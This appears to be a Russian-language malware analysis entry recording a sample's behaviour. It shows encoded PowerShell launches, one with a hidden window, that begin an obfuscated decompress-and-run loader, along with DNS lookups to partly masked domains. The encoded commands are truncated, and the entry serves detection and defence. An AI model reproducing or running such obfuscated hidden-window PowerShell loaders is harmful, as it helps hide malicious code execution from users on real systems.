Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4ARQB3AC0ATwBCAEoARQBDAHQAIABzAHkAUwBUAGUATQAuAEkAbwAuAGMAbwBtAFAAUgBlAFMAcwBJAE8AbgAuAGQARQBmAEwAYQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsASQBvAC4AbQBFAE0ATwBSAHkAcwB0AFIARQBhAG0AXQAgAFsAYwBvAE...
- DNS ASK em###nerji.com
- DNS ASK ha###gems.com
- DNS ASK ha####iltapps.com
- DNS ASK ry###rest.com
- DNS ASK se###five.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4ARQB3AC0ATwBCAEoARQBDAHQAIABzAHkAUwBUAGUATQAuAEkAbwAuAGMAbwBtAFAAUgBlAFMAcwBJAE8AbgAuAGQARQBmAEwAYQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsASQBvAC4AbQBFAE0ATwBSAHkAcwB0AFIARQBhAG0AXQAgAFsAYwBvAE...' (со скрытым окном)